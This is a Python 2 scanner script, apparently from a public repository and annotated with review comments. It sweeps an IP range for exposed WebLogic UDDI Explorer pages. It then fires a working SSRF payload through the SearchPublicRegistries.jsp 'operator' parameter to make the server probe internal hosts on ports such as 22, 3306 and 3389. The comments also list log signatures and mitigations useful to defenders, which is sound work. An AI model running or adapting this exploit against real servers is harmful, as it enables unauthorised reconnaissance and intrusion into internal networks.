#!/usr/bin/env python
#coding:utf-8
# Author: bipabo1l
#
# ssrf_scan -- per the project README: a multi-threaded Python tool that scans
# an IP segment for the WebLogic SSRF vulnerability.
#   Usage:   ./ssrf_scan IP/CIDR -t threads
#   Example: ./ssrf_scan.py 10.20.30.0/24 -t 10
# The README also notes that the address in its screenshot
# (sp20170906_223444.png) came from a telecom-site finding that has since
# been fixed.
#
# NOTE(review): this page lost the file's indentation; the nesting below is
# reconstructed from syntax and should be confirmed against the repository.
# The code is Python 2 (print statements, `Queue`, `except Exception,e`).
#
# Defender view: the traffic this script produces is easy to spot in web access
# logs -- GETs for /uddiexplorer/SetupUDDIExplorer.jsp followed by GETs for
# /uddiexplorer/SearchPublicRegistries.jsp whose `operator=` value names a host
# and a port from `exp_ports`, all with the fixed User-Agent below. Undeploying
# or access-restricting the uddiexplorer application and limiting outbound
# connections from the application server are the usual mitigations.

import re
import sys
import Queue
import threading
import optparse
import requests
import time
from IPy import IP

# Meant to serialise console output between worker threads.
# NOTE(review): it is released on every iteration but acquired only in the
# except branch (see request()), so it does not actually provide exclusion.
printLock = threading.Semaphore(1) #lock Screen print
# Passed as `timeout=` to every requests call.
TimeOut = 5 #request timeout
# Ports on which each address is probed for the UDDI Explorer page.
ports = ['80','8080']
# Ports placed in the `operator` URL of the second-stage request.
exp_ports = ['21','22','23','53','80','443','3306','3389','8080','7001']

# Headers sent with every request: a fixed browser User-Agent and
# `Connection: close`.
header = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36','Connection':'close'}

class scan():
    """Probe every address of a CIDR block for the WebLogic UDDI Explorer pages.

    The addresses are queued once in __init__ and consumed by the worker
    threads that run() starts; each worker executes request().
    """

    def __init__(self,cidr,threads_num):
        """Parse `cidr` with IPy and queue every address it contains.

        cidr        -- network in a form accepted by IPy.IP (e.g. IP/CIDR).
        threads_num -- number of worker threads run() will start.
        """
        self.threads_num = threads_num
        self.cidr = IP(cidr)
        # Build the work queue: one string entry per address in the block.
        self.IPs = Queue.Queue()
        for ip in self.cidr:
            ip = str(ip)
            self.IPs.put(ip)

    def request(self):
        """Worker loop: take addresses off the queue and probe each one.

        For each address and each port in `ports`, GET
        /uddiexplorer/SetupUDDIExplorer.jsp. On HTTP 200 the host/port is
        printed, a host name is extracted from the
        'http://.../uddi/uddilistener' URL in the body, and
        SearchPublicRegistries.jsp is requested once per entry of `exp_ports`
        with `operator` pointing at that host and port. A result row is printed
        when the reply contains the SOAP exception marker and neither of the
        two connection-failure strings. Every exception is swallowed.
        """
        # NOTE(review): threading.Lock() here builds a brand-new lock on each
        # call, so each worker holds its own lock and nothing is serialised.
        with threading.Lock():
            # NOTE(review): qsize() followed by a blocking get() is racy; a
            # worker that loses the race for the last item blocks in get()
            # forever, and because run() starts non-daemon threads the process
            # then never exits.
            while self.IPs.qsize() > 0:
                ip = self.IPs.get()
                for port in ports:
                    try:
                        # Stage 1: is the UDDI Explorer setup page reachable?
                        # Plain HTTP only; a new Session is created per request.
                        r_test = requests.Session().get('http://%s:%s/uddiexplorer/SetupUDDIExplorer.jsp'%(str(ip),str(port)),headers=header,timeout=TimeOut)
                        if r_test.status_code == 200:
                            # The acquire that would pair with the release in
                            # `finally` is commented out in the original.
                            #printLock.acquire()
                            print "|%-16s|%-6s|" % (ip,port)
                            print "+----------------+------+"
                            # Greedy match: captures everything between the
                            # first 'http://' and the last '/uddi/uddilistener'
                            # on a line. With no match, [0] raises IndexError,
                            # which the broad except below hides.
                            regex = 'http://(.*)/uddi/uddilistener'
                            ip_ssrf = re.findall(regex, r_test.content)[0]
                            if ip_ssrf != '':
                                # Keep only the host part; index() raises
                                # ValueError when the match has no ':' (also
                                # swallowed by the except below).
                                index = ip_ssrf.index(':')
                                ip_ssrf = ip_ssrf[:index]
                                for exp_port in exp_ports:
                                    # Stage 2: ask the server to contact
                                    # ip_ssrf:exp_port through `operator`.
                                    r = requests.Session().get('http://%s:%s/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'%(str(ip),str(port),str(ip_ssrf),str(exp_port)),headers=header,timeout=TimeOut)
                                    # Classify the reply by the error text it
                                    # contains; presumably the marker without
                                    # either failure string means the back-end
                                    # connection succeeded -- confirm.
                                    re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',r.content)
                                    re_sult2 = re.findall('No route to host',r.content)
                                    re_sult3 = re.findall('but could not connect',r.content)
                                    if len(re_sult1)!=0 and len(re_sult2)==0 and len(re_sult3)==0:
                                        # NOTE(review): the third column is
                                        # headed "ssrf_ip" in the banner but
                                        # prints `ip` again; ip_ssrf was
                                        # presumably intended -- confirm.
                                        print "|%-16s|%-6s|%-16s|%-6s|" % (str(ip),str(port),str(ip),str(exp_port))
                                        print "+----------------+------+----------------+------+"
                            # NOTE(review): nesting level of this write is
                            # reconstructed -- confirm. Nothing creates ./log/;
                            # if it is missing, the IOError is swallowed below
                            # and no log is written. strNormal(3) presumably
                            # renders the block as first-last address -- verify
                            # against IPy.
                            with open("./log/"+self.cidr.strNormal(3)+".log",'a') as f:
                                f.write(ip+"\n")

                    # NOTE(review): every failure (timeouts, connection
                    # errors, the parsing errors above, the log write) is
                    # discarded here without a message; `e` is unused.
                    except Exception,e:
                        printLock.acquire()
                    # Runs on success too, where nothing was acquired, so the
                    # plain Semaphore's counter only grows.
                    finally:
                        printLock.release()

    # Start the worker threads.
    def run(self):
        """Start `threads_num` threads, each running request().

        The threads are started but not joined here.
        """
        for i in range(self.threads_num):
            t = threading.Thread(target=self.request)
            t.start()

if __name__ == "__main__":
    # Command line: one positional target (IP/CIDR) plus -t/--thread.
    parser = optparse.OptionParser("Usage: %prog [options] target")
    # NOTE(review): the help text advertises default=10 but the actual
    # default is 1.
    parser.add_option("-t", "--thread", dest = "threads_num",
        default = 1, type = "int",
        help = "[optional]number of theads,default=10")
    (options, args) = parser.parse_args()
    # No target given: show usage and exit with status 0.
    if len(args) < 1:
        parser.print_help()
        sys.exit(0)
    # Table banner for the rows printed by request().
    # NOTE(review): the column padding inside the second string looks
    # collapsed on this page; it is reproduced here as shown.
    print "+----------------+------+----------------+------+"
    print "| IP |port |ssrf_ip |port |"
    print "+----------------+------+----------------+------+"

    s = scan(cidr=args[0],threads_num=options.threads_num)
    s.run()